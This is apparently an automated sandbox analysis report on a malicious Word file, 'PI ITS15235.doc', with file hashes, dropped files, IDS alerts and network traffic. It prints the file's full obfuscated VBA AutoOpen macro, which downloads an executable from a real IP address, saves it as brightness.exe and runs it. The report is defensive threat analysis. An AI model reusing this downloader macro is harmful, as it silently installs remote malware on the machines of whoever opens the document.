                                                                                                                                                                        • Filename: image.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: PO_KB#67897.cmd, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse
                                                                                                                                                                        Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Nsltarpn.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):104
                                                                                                                                                                        Entropy (8bit):5.130245247505056
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMWJREXVLBCSsbxeBRuAzyn:HRYFVmTWDyzsVLBCSExenPG
                                                                                                                                                                        MD5:42691CC26BCE94CFC77E2F50703A6842
                                                                                                                                                                        SHA1:3258A1361DC5570FF736D2505DAF7D39E17F3347
                                                                                                                                                                        SHA-256:1B4F07E13746B1562CFF17B7781BD669ACDE1F5DD490983EBC6E94FD670CB832
                                                                                                                                                                        SHA-512:737C446CD92A13F49D01C4EEA1F32531EE4782491E368CB2A3E42A2D38B38E83529F587D1EBAB2CF2303AAB047F119F8A951727AB7D91F31907F8F2194DDBFA4
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Nsltarpn.PIF"..IconIndex=923086..HotKey=64..
                                                                                                                                                                        Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):15789
                                                                                                                                                                        Entropy (8bit):4.658965888116939
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                                                                                        MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                                                                                        SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                                                                                        SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                                                                                        SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.
                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):162
                                                                                                                                                                        Entropy (8bit):2.887786748192681
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:KVGl/lilKlRAGlVFTPIatnzdlNkFRniRtGn:KVy/4KDjtPJsF1iRtG
                                                                                                                                                                        MD5:C1D92AF5CEEA4F15A6FFCF4C637F8C61
                                                                                                                                                                        SHA1:B37CC95AB6B4F411DA275B1594DAA2DC6C79CD45
                                                                                                                                                                        SHA-256:1C3007BE8D3FE79E2E604C432C9E3AD58802BC3E3C5066872EF7B0772309499B
                                                                                                                                                                        SHA-512:76E333DCD732C7C9BE6C3CF5A6275220F0058B0C17776D2C0793352BA9321ED2AF3B04900E7E9C6366CCB500DF876F9983A7261199357599FDF21896E89D5283
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.user..................................................j.o.n.e.s...4..........-.......u...a.i........4F...................................-..'..}..i.........=.i
                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1161216
                                                                                                                                                                        Entropy (8bit):7.248914742573976
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
                                                                                                                                                                        MD5:BF9B75ADF866583299DBC8A5FAD66CFC
                                                                                                                                                                        SHA1:377F83F54D1226A181F265557804001CB9DEEE6A
                                                                                                                                                                        SHA-256:1BEC44AA19EA8DAA0B7151B312975F3F753E03F0BBCE5EBEAB8DFDA5FB736A91
                                                                                                                                                                        SHA-512:384B92D7ECBD8C5242815CB8EC6BCE0096412D2F558C61C4C91A5AFF38D3DA8CF297D40362B91C1F4620D02700954FBEE71519E4735EE4BD17413EE491220FD7
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Nadine Daniel, Template: Normal.dotm, Last Saved By: GRACE, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sun Jan 5 21:35:00 2025, Last Saved Time/Date: Sun Jan 5 21:35:00 2025, Number of Pages: 1, Number of Words: 348, Number of Characters: 1985, Security: 0
                                                                                                                                                                        Entropy (8bit):4.315023169051503
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Microsoft Word document (32009/1) 54.23%
                                                                                                                                                                        • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                                                                                                                        File name:PI ITS15235.doc
                                                                                                                                                                        File size:52'736 bytes
                                                                                                                                                                        MD5:1be2a4992097f506fd7ddb85625c2f1e
                                                                                                                                                                        SHA1:f197c2aa2c4c1dd1059d04309b22359d46fec69b
                                                                                                                                                                        SHA256:5573f50bf399a289981af095f020610e04ede3126835312bf7dc4de27f6bb602
                                                                                                                                                                        SHA512:02772db9177dbd1152740078b276b33d3ef79943d6057725da800b7f16af4cda8deb666a42013e8569a36ec4a57739056e496b14c9bb229e01c154c7ea19f5ea
                                                                                                                                                                        SSDEEP:384:Gp0xfMDVBv2xv8R8dFMjNCC4iKncEOqO6tJiSsqdg1vA9tz1/tfxP0jGaHfZtyga:GkUDrMOgPyU+1o9tlt1ha//vOFl
                                                                                                                                                                        TLSH:B3334321B2C1DE2BE0364875C989C6747724FDABAD95850735C97F1F7C3EA209A83B50
                                                                                                                                                                        Icon Hash:35e1cc889a8a8599
                                                                                                                                                                        Document Type:OLE
                                                                                                                                                                        Number of OLE Files:1
                                                                                                                                                                        Has Summary Info:
                                                                                                                                                                        Application Name:Microsoft Office Word
                                                                                                                                                                        Encrypted Document:False
                                                                                                                                                                        Contains Word Document Stream:True
                                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                                        Contains ObjectPool Stream:False
                                                                                                                                                                        Flash Objects Count:0
                                                                                                                                                                        Contains VBA Macros:True
                                                                                                                                                                        Code Page:1252
                                                                                                                                                                        Title:
                                                                                                                                                                        Subject:
                                                                                                                                                                        Author:Nadine Daniel
                                                                                                                                                                        Keywords:
                                                                                                                                                                        Comments:
                                                                                                                                                                        Template:Normal.dotm
                                                                                                                                                                        Last Saved By:GRACE
                                                                                                                                                                        Revision Number:2
                                                                                                                                                                        Total Edit Time:0
                                                                                                                                                                        Create Time:2025-01-05 21:35:00
                                                                                                                                                                        Last Saved Time:2025-01-05 21:35:00
                                                                                                                                                                        Number of Pages:1
                                                                                                                                                                        Number of Words:348
                                                                                                                                                                        Number of Characters:1985
                                                                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                                                                        Security:0
                                                                                                                                                                        Document Code Page:1252
                                                                                                                                                                        Number of Lines:16
                                                                                                                                                                        Number of Paragraphs:4
                                                                                                                                                                        Thumbnail Scaling Desired:False
                                                                                                                                                                        Company:
                                                                                                                                                                        Contains Dirty Links:False
                                                                                                                                                                        Shared Document:False
                                                                                                                                                                        Changed Hyperlinks:False
                                                                                                                                                                        Application Version:983040
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:Macros/VBA/ThisDocument
                                                                                                                                                                        VBA File Name:ThisDocument.cls
                                                                                                                                                                        Stream Size:4807
                                                                                                                                                                        Attribute VB_Name = "ThisDocument"
                                                                                                                                                                        Attribute VB_Base = "1Normal.ThisDocument"
                                                                                                                                                                        Attribute VB_GlobalNameSpace = False
                                                                                                                                                                        Attribute VB_Creatable = False
                                                                                                                                                                        Attribute VB_PredeclaredId = True
                                                                                                                                                                        Attribute VB_Exposed = True
                                                                                                                                                                        Attribute VB_TemplateDerived = True
                                                                                                                                                                        Attribute VB_Customizable = True
                                                                                                                                                                        Sub AutoOpen()
                                                                                                                                                                         
                                                                                                                                                                        Dim xHttp:
                                                                                                                                                                        'this is a comment
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")
                                                                                                                                                                        'this is a comment
                                                                                                                                                                        Dim bStrm:
                                                                                                                                                                        'this is a comment
                                                                                                                                                                        Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        Dim nirm1
                                                                                                                                                                        nirm1 = "h"
                                                                                                                                                                        Dim nirm2
                                                                                                                                                                        nirm2 = "t"
                                                                                                                                                                        Dim nirm3
                                                                                                                                                                        nirm3 = "t" & "p:/" & "/147.124.216.113/albt"
                                                                                                                                                                        Dim nirm4
                                                                                                                                                                        nirm4 = "."
                                                                                                                                                                        Dim nirm5
                                                                                                                                                                        nirm5 = "e"
                                                                                                                                                                        Dim nirm6
                                                                                                                                                                        nirm6 = "x"
                                                                                                                                                                        Dim nirm7
                                                                                                                                                                        nirm7 = "e"
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        Dim plpl
                                                                                                                                                                        plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7
                                                                                                                                                                        
                                                                                                                                                                        'this is a comment
                                                                                                                                                                        xHttp.Open "GET", plpl, False
                                                                                                                                                                        xHttp.Send
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                         
                                                                                                                                                                        With bStrm
                                                                                                                                                                         .Type = 1
                                                                                                                                                                        .Open
                                                                                                                                                                         .write xHttp.responsebody
                                                                                                                                                                         
                                                                                                                                                                         'this is a comment
                                                                                                                                                                         
                                                                                                                                                                        Dim monu1
                                                                                                                                                                         monu1 = "brightness"
                                                                                                                                                                         Dim monu2
                                                                                                                                                                         monu2 = "."
                                                                                                                                                                         'this is a comment
                                                                                                                                                                         Dim monu3
                                                                                                                                                                         monu3 = "e"
                                                                                                                                                                         'this is a comment
                                                                                                                                                                         Dim monu4
                                                                                                                                                                         monu4 = "x"
                                                                                                                                                                         'this is a comment
                                                                                                                                                                         Dim monu5
                                                                                                                                                                         monu5 = "e"
                                                                                                                                                                         'this is a comment
                                                                                                                                                                         Dim monu6
                                                                                                                                                                         monu6 = monu1 & monu2 & monu3 & monu4 & monu5
                                                                                                                                                                         
                                                                                                                                                                         
                                                                                                                                                                         .savetofile monu6, 2
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        Dim parveen1
                                                                                                                                                                        Dim parveen2
                                                                                                                                                                        Dim parveen3
                                                                                                                                                                        Dim parveen4
                                                                                                                                                                        Dim praveen1
                                                                                                                                                                        praveen1 = """brightness"
                                                                                                                                                                        Dim praveen2
                                                                                                                                                                        praveen2 = "."
                                                                                                                                                                        'this is a comment
                                                                                                                                                                        Dim praveen3
                                                                                                                                                                        praveen3 = "e"
                                                                                                                                                                        'this is a comment
                                                                                                                                                                        Dim praveen4
                                                                                                                                                                        praveen4 = "x"
                                                                                                                                                                        'this is a comment
                                                                                                                                                                        Dim praveen5
                                                                                                                                                                        praveen5 = "e"""
                                                                                                                                                                        'this is a comment
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        Dim praveen6
                                                                                                                                                                        praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
                                                                                                                                                                         
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        End With
                                                                                                                                                                         
                                                                                                                                                                        Shell (praveen6)
                                                                                                                                                                         
                                                                                                                                                                        End Sub
                                                                                                                                                                        

                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x1CompObj
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:114
                                                                                                                                                                        Entropy:4.235956365095031
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:4096
                                                                                                                                                                        Entropy:0.248545188854887
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x5SummaryInformation
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:4096
                                                                                                                                                                        Entropy:0.48193968987671315
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:1Table
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:7882
                                                                                                                                                                        Entropy:5.8830839857068025
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:Data
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:4618
                                                                                                                                                                        Entropy:4.726776485086767
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:Macros/PROJECT
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Stream Size:382
                                                                                                                                                                        Entropy:5.323463291901678
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:Macros/PROJECTwm
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:41
                                                                                                                                                                        Entropy:3.0773844850752607
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:2910
                                                                                                                                                                        Entropy:4.347456610716895
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:Macros/VBA/dir
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:VAX-order 68k Blit mpx/mux executable
                                                                                                                                                                        Stream Size:522
                                                                                                                                                                        Entropy:6.270795228511715
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:WordDocument
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:17972
                                                                                                                                                                        Entropy:4.458555026314971
                                                                                                                                                                        Base64 Encoded:True
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-06T07:53:18.199849+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 166.62.27.188 | 443 | TCP
2025-01-06T07:53:26.185701+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49753 | 158.101.44.242 | 80 | TCP
2025-01-06T07:53:27.495502+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49753 | 158.101.44.242 | 80 | TCP
2025-01-06T07:53:27.933122+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49755 | 188.114.96.3 | 443 | TCP
2025-01-06T07:53:28.592083+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49756 | 158.101.44.242 | 80 | TCP
2025-01-06T07:53:30.961117+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49759 | 188.114.96.3 | 443 | TCP
2025-01-06T07:53:32.919827+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49762 | 188.114.96.3 | 443 | TCP
2025-01-06T07:53:34.524984+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49764 | 188.114.96.3 | 443 | TCP
2025-01-06T07:53:36.797073+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49768 | 188.114.96.3 | 443 | TCP
2025-01-06T07:53:37.614845+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49767 | 158.101.44.242 | 80 | TCP
2025-01-06T07:53:39.114951+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49767 | 158.101.44.242 | 80 | TCP
2025-01-06T07:53:39.678729+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49776 | 188.114.96.3 | 443 | TCP
2025-01-06T07:53:40.308163+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49779 | 158.101.44.242 | 80 | TCP
2025-01-06T07:53:40.506357+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49778 | 149.154.167.220 | 443 | TCP
2025-01-06T07:53:40.913383+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49780 | 188.114.96.3 | 443 | TCP
2025-01-06T07:53:42.711030+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49783 | 188.114.96.3 | 443 | TCP
2025-01-06T07:53:44.665578+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49786 | 158.101.44.242 | 80 | TCP
2025-01-06T07:53:46.009341+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49786 | 158.101.44.242 | 80 | TCP
2025-01-06T07:53:46.590984+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49791 | 188.114.96.3 | 443 | TCP
2025-01-06T07:53:48.430076+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49795 | 188.114.96.3 | 443 | TCP
2025-01-06T07:53:48.681290+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49794 | 158.101.44.242 | 80 | TCP
2025-01-06T07:53:49.287543+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49798 | 188.114.96.3 | 443 | TCP
2025-01-06T07:53:50.496870+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49802 | 188.114.96.3 | 443 | TCP
2025-01-06T07:53:52.312826+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49805 | 149.154.167.220 | 443 | TCP
2025-01-06T07:53:53.209273+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49806 | 188.114.96.3 | 443 | TCP
2025-01-06T07:54:00.405289+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49818 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                        Jan 6, 2025 07:53:15.279581070 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.279624939 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.279725075 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.279750109 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.279764891 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.279793024 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.279808044 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.279819012 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.279829025 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.279863119 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.280615091 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.280630112 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.280643940 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.280683041 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.318684101 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.318720102 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.318734884 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.318773985 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.318803072 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.318881035 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.318897009 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.318911076 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.318937063 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.319005966 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.319036007 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.319075108 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.319777012 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.319798946 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.319829941 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.319844007 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.319847107 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.319861889 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.319865942 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.319900036 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.320557117 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366307020 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366338968 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366354942 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366377115 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.366394997 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.366413116 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366429090 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366477966 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.366808891 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366832018 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366847992 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366872072 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.367172956 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367198944 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367216110 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367218971 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.367230892 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367247105 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367250919 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.367286921 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.367945910 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367960930 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367975950 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367996931 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367999077 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.368011951 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.368037939 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.368751049 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.368766069 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.368788004 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.368813992 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.368838072 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.405481100 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405512094 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405524969 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405540943 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405563116 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405606985 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.405646086 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.405910015 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405925989 CET8049739147.124.216.113192.168.2.4
